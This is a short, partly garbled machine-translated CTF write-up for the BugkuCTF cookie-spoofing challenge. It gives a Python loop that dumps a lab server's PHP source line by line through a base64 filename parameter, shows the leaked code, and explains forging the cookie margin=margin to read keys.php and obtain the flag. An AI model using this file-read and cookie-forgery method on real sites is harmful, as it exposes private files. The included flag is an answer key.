BugkuCTFクッキー詐欺

9098 ワード

BugkuCTF cookies欺骗_第1张图片ページの乱符号化ソースコードもurlの中にbase 64 BugkuCTF cookies欺骗_第2张图片のような列があるだけでなく、このページがkeysにアクセスする可能性があることを示している.txt、filenameをindexに変更する.phh base 64暗号化aW 5 kZXgucGhw lineを変更するとコードが得られるかスクリプトを書くかは自分で1行1行しかできません
import requests
a=30
for i in range(a):
    url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    s=requests.get(url)
    print s.text
--------------------- 
  :      
  :https://blog.csdn.net/qq_26090065/article/details/81588595 

	error_reporting(0);
	$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
	$line=isset($_GET['line'])?intval($_GET['line']):0;
	if($file=='') 
	header("location:index.php?line=&filename=a2V5cy50eHQ=");
	$file_list = array(
	'0' =>'keys.txt',
	'1' =>'index.php',
	);
	if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){       //   
	$file_list[2]='keys.php';
	} 
	if(in_array($file, $file_list)){
	$fa = file($file);
	echo $fa[$line];
}
?>

cookieはmargin=marginアクセスkeysである.phpでいいa 2 V 5 cy 5 waHA=
BugkuCTF cookies欺骗_第3张图片ソースコード中 flag:KEY{key_keys}